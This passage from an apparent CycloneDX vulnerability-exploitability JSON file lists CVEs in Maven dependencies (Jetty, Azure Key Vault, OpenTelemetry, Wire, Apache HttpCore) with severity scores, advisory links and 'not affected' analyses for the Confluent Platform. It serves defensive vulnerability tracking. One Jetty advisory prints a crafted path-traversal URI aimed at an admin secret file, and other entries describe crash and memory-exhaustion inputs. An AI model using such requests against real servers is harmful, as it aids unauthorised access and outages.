        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. No CP repository constructs or starts a JLine Telnet server anywhere, so the vulnerable NAWS terminal-geometry sink in TelnetIO is never reachable."
      }
    },
    {
      "id": "CVE-2026-6790",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
        }
      ],
      "cwes": [
        20
      ],
      "description": "In Eclipse Jetty, for HTTP/1, HTTP/2 and HTTP/3 requests, there is no strict check that the request authority (host and port) matches what provided in the Host header (if present).\n\n\n\n\nThis was not enforced in earlier HTTP RFC (for example, in RFC 2616), but it is in the latest RFC (9110 and 9112).\n\n\n\n\nThis mismatch can cause a number of problems that may be classified as vulnerabilities such as:\n\n\n\n  *  \n        \n      URI constructions (for example, for redirects -- this is typical for login pages)\n\n  *  \n        \n      Virtual host selection\n\n  *  \n        \n      Reverse proxying\n\n  *  \n        \n      Misleading logs\n\n  *  \n        \n      Etc.\n\n\n\n\n\n\nGiven that the latest RFCs require that request authority and Host header must match, Jetty should enforce this invariant.",
      "recommendation": "Upgrade org.eclipse.jetty:jetty-server to version 12.0.35, 12.1.9",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-6790"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-6790"
        },
        {
          "url": "https://github.com/jetty/jetty.project"
        },
        {
          "url": "https://github.com/jetty/jetty.project/commit/3e5a4daec196859b8886b6f67b1157dab47cdb6f"
        },
        {
          "url": "https://github.com/jetty/jetty.project/commit/67ba9e6b39661810123680d9c894e99a7940c73d"
        },
        {
          "url": "https://github.com/jetty/jetty.project/commit/cbca3076f7c914a232e7a8b22fa95fbf7e67a6cc"
        },
        {
          "url": "https://github.com/jetty/jetty.project/issues/14870"
        },
        {
          "url": "https://github.com/jetty/jetty.project/pull/14871"
        },
        {
          "url": "https://github.com/jetty/jetty.project/pull/14897"
        },
        {
          "url": "https://github.com/jetty/jetty.project/pull/14970"
        },
        {
          "url": "https://github.com/jetty/jetty.project/releases/tag/jetty-12.0.35"
        },
        {
          "url": "https://github.com/jetty/jetty.project/releases/tag/jetty-12.1.9"
        },
        {
          "url": "https://github.com/jetty/jetty.project/security/advisories/GHSA-7p3p-8qv8-m2vh"
        },
        {
          "url": "https://gitlab.eclipse.org/security/cve-assignment/-/work_items/99"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6790"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-6790"
        }
      ],
      "published": "2026-07-14T09:16:41+00:00",
      "updated": "2026-07-14T18:35:54+00:00",
      "affects": [
        {
          "ref": "pkg:maven/org.eclipse.jetty/jetty-server@12.0.34",
          "versions": [
            {
              "version": "12.0.34",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e02dd261-cd8f-4913-980a-9e4efbca1fa6/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.34"
        },
        {
          "ref": "urn:cdx:3e20bc2e-deb8-49f0-9e54-5b4fbb1643f4/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.34"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.34"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.34"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.34"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.34"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.34"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.34"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.34"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.34"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.34"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-8384",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
        }
      ],
      "cwes": [
        647
      ],
      "description": "In Eclipse Jetty, an HTTP URI of this form:\n\n\n\n\n\n/public;/../admin/secret.txt\n\n\n\n\n\n\n\n\nresults in an unresolved path of:\n\n\n\n\n\n/public/../admin/secret.txt\n\n\n\n\n\n\n\n\ninstead of the expected:\n\n\n\n\n\n/admin/secret.txt\n\n\n\n\n\n\n\n\nJetty itself is not affected, as it will not serve the secret.txt file because it will not pass the alias checker (only resolved resources are served).\n\n\n\n\nHowever, web applications that rely on resolved paths being provided by Jetty may be confused when receiving an unresolved path.",
      "recommendation": "Upgrade org.eclipse.jetty:jetty-util to version 12.0.35, 12.1.9",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-8384"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-8384"
        },
        {
          "url": "https://github.com/jetty/jetty.project"
        },
        {
          "url": "https://github.com/jetty/jetty.project/commit/82969c77f6da46e27008b10b3c14840cd31db084"
        },
        {
          "url": "https://github.com/jetty/jetty.project/commit/ade27ce93a37c33278720250d85c48601230ae3f"
        },
        {
          "url": "https://github.com/jetty/jetty.project/pull/14969"
        },
        {
          "url": "https://github.com/jetty/jetty.project/pull/14973"
        },
        {
          "url": "https://github.com/jetty/jetty.project/releases/tag/jetty-12.0.35"
        },
        {
          "url": "https://github.com/jetty/jetty.project/releases/tag/jetty-12.1.9"
        },
        {
          "url": "https://github.com/jetty/jetty.project/security/advisories/GHSA-w7x5-g22v-xqhr"
        },
        {
          "url": "https://gitlab.eclipse.org/security/cve-assignment/-/work_items/108"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-8384"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-8384"
        }
      ],
      "published": "2026-07-14T09:16:42+00:00",
      "updated": "2026-07-14T18:39:51+00:00",
      "affects": [
        {
          "ref": "pkg:maven/org.eclipse.jetty/jetty-util@12.0.34",
          "versions": [
            {
              "version": "12.0.34",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e02dd261-cd8f-4913-980a-9e4efbca1fa6/1#pkg:maven/org.eclipse.jetty/jetty-util@12.0.34"
        },
        {
          "ref": "urn:cdx:3e20bc2e-deb8-49f0-9e54-5b4fbb1643f4/1#pkg:maven/org.eclipse.jetty/jetty-util@12.0.34"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:maven/org.eclipse.jetty/jetty-util@12.0.34"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:maven/org.eclipse.jetty/jetty-util@12.0.34"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:maven/org.eclipse.jetty/jetty-util@12.0.34"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:maven/org.eclipse.jetty/jetty-util@12.0.34"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:maven/org.eclipse.jetty/jetty-util@12.0.34"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:maven/org.eclipse.jetty/jetty-util@12.0.34"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:maven/org.eclipse.jetty/jetty-util@12.0.34"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:maven/org.eclipse.jetty/jetty-util@12.0.34"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:maven/org.eclipse.jetty/jetty-util@12.0.34"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-33117",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 9.1,
          "severity": "critical",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"
        }
      ],
      "cwes": [
        287,
        347
      ],
      "description": "The Java Key Vault Keys library in the Azure SDK for Java contains an issue in the local cryptographic verification path where authentication tag comparison was implemented incorrectly. In affected applications that use the vulnerable local cryptography path, specially crafted encrypted input may bypass integrity verification checks. Operations delegated to the Key Vault service are not affected. The issue is addressed in version 4.10.6.",
      "recommendation": "Upgrade com.azure:azure-security-keyvault-keys to version 4.10.6",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-33117"
        },
        {
          "url": "https://github.com/Azure/azure-sdk-for-java"
        },
        {
          "url": "https://github.com/Azure/azure-sdk-for-java/commit/1b5c5c79d85a5c9a9cfd07f6cdff6fd0f50eccf9"
        },
        {
          "url": "https://github.com/Azure/azure-sdk-for-java/pull/48476"
        },
        {
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33117"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33117"
        }
      ],
      "published": "2026-05-12T18:17:04+00:00",
      "updated": "2026-06-17T10:36:58+00:00",
      "affects": [
        {
          "ref": "pkg:maven/com.azure/azure-security-keyvault-keys@4.10.3",
          "versions": [
            {
              "version": "4.10.3",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/com.azure/azure-security-keyvault-keys@4.10.3",
          "versions": [
            {
              "version": "4.10.3",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/com.azure/azure-security-keyvault-keys@4.9.2",
          "versions": [
            {
              "version": "4.9.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:970135fe-744c-475b-9f5e-65aa475756fc/1#a27e35ea-488c-4aa0-87d3-55dbb363107e"
        },
        {
          "ref": "urn:cdx:4c40e9d9-e7f5-4ca1-9f62-645e9d880727/1#pkg:maven/com.azure/azure-security-keyvault-keys@4.10.3"
        },
        {
          "ref": "urn:cdx:653f91e3-86f8-4a44-b1b9-2f9103b70aa0/1#pkg:maven/com.azure/azure-security-keyvault-keys@4.9.2"
        },
        {
          "ref": "urn:cdx:42153134-38e9-4c4f-8207-05e638c352d6/1#b4ab6a48-ce57-434b-991c-215f6f801c3d"
        },
        {
          "ref": "urn:cdx:3e20bc2e-deb8-49f0-9e54-5b4fbb1643f4/1#pkg:maven/com.azure/azure-security-keyvault-keys@4.10.3"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:maven/com.azure/azure-security-keyvault-keys@4.10.3"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:maven/com.azure/azure-security-keyvault-keys@4.9.2"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:maven/com.azure/azure-security-keyvault-keys@4.9.2"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#d3be7028-39df-4d2a-bbed-6ecee64899b1"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#a30c6107-94f6-498e-81f8-18c32fd1ef62"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:maven/com.azure/azure-security-keyvault-keys@4.9.2"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#eb739acf-4fbc-47d5-81bb-277cdfd77e8b"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:maven/com.azure/azure-security-keyvault-keys@4.9.2"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#9423f388-8670-4cea-bd9d-2d6de38a620e"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#d1e12af1-775b-431f-b5ba-c6620e210621"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:maven/com.azure/azure-security-keyvault-keys@4.9.2"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#fd3295eb-fa09-49a9-8212-2d5071987fd2"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:maven/com.azure/azure-security-keyvault-keys@4.9.2"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#febe0d38-d9ea-4592-b2b6-6ee3e0897bea"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:maven/com.azure/azure-security-keyvault-keys@4.9.2"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:maven/com.azure/azure-security-keyvault-keys@4.10.3"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "protected_by_mitigating_control",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. the product delegates key operations to the Azure Key Vault service (RSA-OAEP wrap/unwrap for envelope encryption); the vulnerable client-side local crypto path is not exercised, so the security-feature bypass is not reachable."
      }
    },
    {
      "id": "CVE-2026-45292",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        770
      ],
      "description": "opentelemetry-java is the Java implementation of the OpenTelemetry API for recording telemetry, and SDK for managing telemetry recorded by the API. Prior to 1.62.0, a vulnerability affects the baggage propagation implementation in opentelemetry-api and opentelemetry-extension-trace-propagators. Parsing oversized baggage causes unbounded memory allocation and CPU consumption. Because baggage is automatically re-injected into every outgoing request, the effect can fan out to downstream services that never received the original malicious request. This vulnerability is fixed in 1.62.0.",
      "recommendation": "Upgrade io.opentelemetry:opentelemetry-api to version 1.62.0",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-45292"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:28573"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:36820"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:41951"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:43038"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-45292"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2482785"
        },
        {
          "url": "https://github.com/open-telemetry/opentelemetry-java"
        },
        {
          "url": "https://github.com/open-telemetry/opentelemetry-java/commit/03837d3c1763bc35464aea1078671e2ef2336a5f"
        },
        {
          "url": "https://github.com/open-telemetry/opentelemetry-java/pull/8380"
        },
        {
          "url": "https://github.com/open-telemetry/opentelemetry-java/releases/tag/v1.62.0"
        },
        {
          "url": "https://github.com/open-telemetry/opentelemetry-java/security/advisories/GHSA-rcgg-9c38-7xpx"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45292"
        },
        {
          "url": "https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-45292.json"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-45292"
        }
      ],
      "published": "2026-05-28T17:16:32+00:00",
      "updated": "2026-08-17T12:18:43+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.opentelemetry/opentelemetry-api@1.42.0",
          "versions": [
            {
              "version": "1.42.0",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:970135fe-744c-475b-9f5e-65aa475756fc/1#pkg:maven/io.opentelemetry/opentelemetry-api@1.42.0"
        },
        {
          "ref": "urn:cdx:786f064b-a940-4937-9022-4b9b3ea2938e/1#pkg:maven/io.opentelemetry/opentelemetry-api@1.42.0"
        },
        {
          "ref": "urn:cdx:1927755b-d423-4e30-8d32-4b9c1f7386ae/1#pkg:maven/io.opentelemetry/opentelemetry-api@1.42.0"
        },
        {
          "ref": "urn:cdx:4c40e9d9-e7f5-4ca1-9f62-645e9d880727/1#pkg:maven/io.opentelemetry/opentelemetry-api@1.42.0"
        },
        {
          "ref": "urn:cdx:82acba58-7e67-475b-bbb0-774b260bff77/1#pkg:maven/io.opentelemetry/opentelemetry-api@1.42.0"
        },
        {
          "ref": "urn:cdx:42153134-38e9-4c4f-8207-05e638c352d6/1#c9dfa16a-6713-4bb1-9bb1-c5e0ce19a57d"
        },
        {
          "ref": "urn:cdx:3e20bc2e-deb8-49f0-9e54-5b4fbb1643f4/1#pkg:maven/io.opentelemetry/opentelemetry-api@1.42.0"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:maven/io.opentelemetry/opentelemetry-api@1.42.0"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#e8e4380e-f810-42c7-b815-8d5301dfe3c1"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#ea523cd1-f015-4e30-89e2-88124bd775bf"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#e25e33c5-e980-4ce6-8288-23133c8fb869"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#fb3341a2-5819-4d44-b143-9a7513f92dc2"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#df39c0e9-aaad-444d-b72a-d5a6811f30c2"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#de896846-1c31-4916-8608-004369815da1"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#b9b3d54a-a99e-4deb-b874-90026f8e1f5b"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:maven/io.opentelemetry/opentelemetry-api@1.42.0"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#f406a56d-d339-46d8-bc14-8a6515522f7d"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. the OpenTelemetry W3C Baggage propagator is not wired to parse inbound request headers, so the unbounded baggage-allocation path is not reachable."
      }
    },
    {
      "id": "CVE-2026-45799",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        129
      ],
      "description": "Wire provides gRPC and protocol buffers for Android, Kotlin, Swift, and Java. Prior to 6.3.0 and 7.0.0-alpha03, ByteArrayProtoReader32.skipGroup() and ProtoReader.skipGroup() in wire-runtime do not validate that a LENGTH_DELIMITED field length is non-negative before skip(), allowing a crafted protobuf varint encoding -128 as a signed Int to make skip(-128) move the internal position negative and make the next readByte() throw ArrayIndexOutOfBoundsException instead of the documented IOException or ProtocolException, which can crash services using ProtoAdapter.decode(byte[]) on untrusted payloads. This issue is fixed in versions 6.3.0 and 7.0.0-alpha03.",
      "recommendation": "Upgrade com.squareup.wire:wire-runtime-jvm to version 6.3.0, 7.0.0-alpha03",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-45799"
        },
        {
          "url": "https://github.com/square/wire"
        },
        {
          "url": "https://github.com/square/wire/commit/47d5b0dba53935d5332cd41a80a353b3fc90e7b0"
        },
        {
          "url": "https://github.com/square/wire/commit/e4e56fab38a547d9625f05c97f1d8f0bcc3a5773"
        },
        {
          "url": "https://github.com/square/wire/pull/3595"
        },
        {
          "url": "https://github.com/square/wire/pull/3597"
        },
        {
          "url": "https://github.com/square/wire/releases/tag/6.3.0"
        },
        {
          "url": "https://github.com/square/wire/releases/tag/7.0.0-alpha03"
        },
        {
          "url": "https://github.com/square/wire/security/advisories/GHSA-7xpr-hc2w-34m9"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45799"
        }
      ],
      "published": "2026-07-17T20:17:18+00:00",
      "updated": "2026-08-12T19:04:04+00:00",
      "affects": [
        {
          "ref": "pkg:maven/com.squareup.wire/wire-runtime-jvm@5.5.0",
          "versions": [
            {
              "version": "5.5.0",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:970135fe-744c-475b-9f5e-65aa475756fc/1#pkg:maven/com.squareup.wire/wire-runtime-jvm@5.5.0"
        },
        {
          "ref": "urn:cdx:1c2d07e7-bc46-4c64-85c9-cf1f4b389599/1#pkg:maven/com.squareup.wire/wire-runtime-jvm@5.5.0"
        },
        {
          "ref": "urn:cdx:786f064b-a940-4937-9022-4b9b3ea2938e/1#pkg:maven/com.squareup.wire/wire-runtime-jvm@5.5.0"
        },
        {
          "ref": "urn:cdx:653f91e3-86f8-4a44-b1b9-2f9103b70aa0/1#6771947e-50c5-49fc-93b3-29b185c56b76"
        },
        {
          "ref": "urn:cdx:42153134-38e9-4c4f-8207-05e638c352d6/1#db032602-0cc9-44fe-8200-90125927b571"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:maven/com.squareup.wire/wire-runtime-jvm@5.5.0"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#b2bb96a8-7373-449d-988c-9aba44fb9455"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#e5e48299-87f4-4acc-9a22-2314cca2f121"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#a688d6dc-3779-48bf-b832-2950b512926e"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#f23cc339-f2c4-43c0-a68f-a3ae7efc8bcc"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#f0907cbf-62ec-4512-b569-fc7b6cf6b264"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#991d5839-1d3d-4097-8bc7-0a7158139232"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#d44dd491-7b78-4a6f-add8-cfd07f571f16"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#dd4750a4-06e0-47b9-b503-1534245be222"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#8b393357-491e-4eb7-aad4-393f3ef6931a"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:maven/com.squareup.wire/wire-runtime-jvm@5.5.0"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:maven/com.squareup.wire/wire-runtime-jvm@5.5.0"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#ce39ec46-7eb7-4711-a1f0-7be3924f8e87"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-54399",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        400
      ],
      "description": "Uncontrolled Resource Consumption vulnerability in the HTTP/1.1 message parser\u00a0in Apache HttpComponents Core (5.4.2 and earlier, 5.5-beta1 and earlier) allows\u00a0an remote attacker to cause a denial of service through memory exhaustion by sending messages with excessive number of headers / excessive header length",
      "recommendation": "Upgrade org.apache.httpcomponents.core5:httpcore5 to version 5.4.3, 5.5-beta2",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-54399"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/07/01/4"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-54399"
        },
        {
          "url": "https://github.com/apache/httpcomponents-core"
        },
        {
          "url": "https://github.com/apache/httpcomponents-core/commit/d96a00fec9b2e19f8005e35681df5f6cd6e21a9e"
        },
        {
          "url": "https://github.com/apache/httpcomponents-core/commit/fdc53a32fe0fccf098cc67e71cd125e447c759ed"
        },
        {
          "url": "https://lists.apache.org/thread/zmxh1pl2zohov5ntdh4lt85gfrlchgpy"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-54399"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-54399"
        }
      ],
      "published": "2026-07-01T17:16:36+00:00",
      "updated": "2026-07-24T20:04:03+00:00",
      "affects": [
        {
          "ref": "pkg:maven/org.apache.httpcomponents.core5/httpcore5@5.3.4",
          "versions": [
            {
              "version": "5.3.4",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/org.apache.httpcomponents.core5/httpcore5@5.3.4",
          "versions": [
            {
              "version": "5.3.4",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/org.apache.httpcomponents.core5/httpcore5@5.0.2",
          "versions": [
            {
              "version": "5.0.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:970135fe-744c-475b-9f5e-65aa475756fc/1#f225e01a-503c-4b5b-8998-42fd8cbabdac"
        },
        {
          "ref": "urn:cdx:1c2d07e7-bc46-4c64-85c9-cf1f4b389599/1#pkg:maven/org.apache.httpcomponents.core5/httpcore5@5.3.4"
        },
        {
          "ref": "urn:cdx:786f064b-a940-4937-9022-4b9b3ea2938e/1#pkg:maven/org.apache.httpcomponents.core5/httpcore5@5.3.4"
        },
        {
          "ref": "urn:cdx:1927755b-d423-4e30-8d32-4b9c1f7386ae/1#pkg:maven/org.apache.httpcomponents.core5/httpcore5@5.3.4"
        },
        {
          "ref": "urn:cdx:4c40e9d9-e7f5-4ca1-9f62-645e9d880727/1#pkg:maven/org.apache.httpcomponents.core5/httpcore5@5.0.2"
        },
        {
          "ref": "urn:cdx:653f91e3-86f8-4a44-b1b9-2f9103b70aa0/1#cb4a507c-d952-4370-9108-3d1ef9986f40"
        },
        {
          "ref": "urn:cdx:42153134-38e9-4c4f-8207-05e638c352d6/1#ba4dd4e0-b5f5-4728-a148-8a30b312adbc"
        },
        {
          "ref": "urn:cdx:42153134-38e9-4c4f-8207-05e638c352d6/1#d4748de1-8982-4433-98d5-fcb701469550"
        },
        {
          "ref": "urn:cdx:3e20bc2e-deb8-49f0-9e54-5b4fbb1643f4/1#pkg:maven/org.apache.httpcomponents.core5/httpcore5@5.3.4"
        },
        {
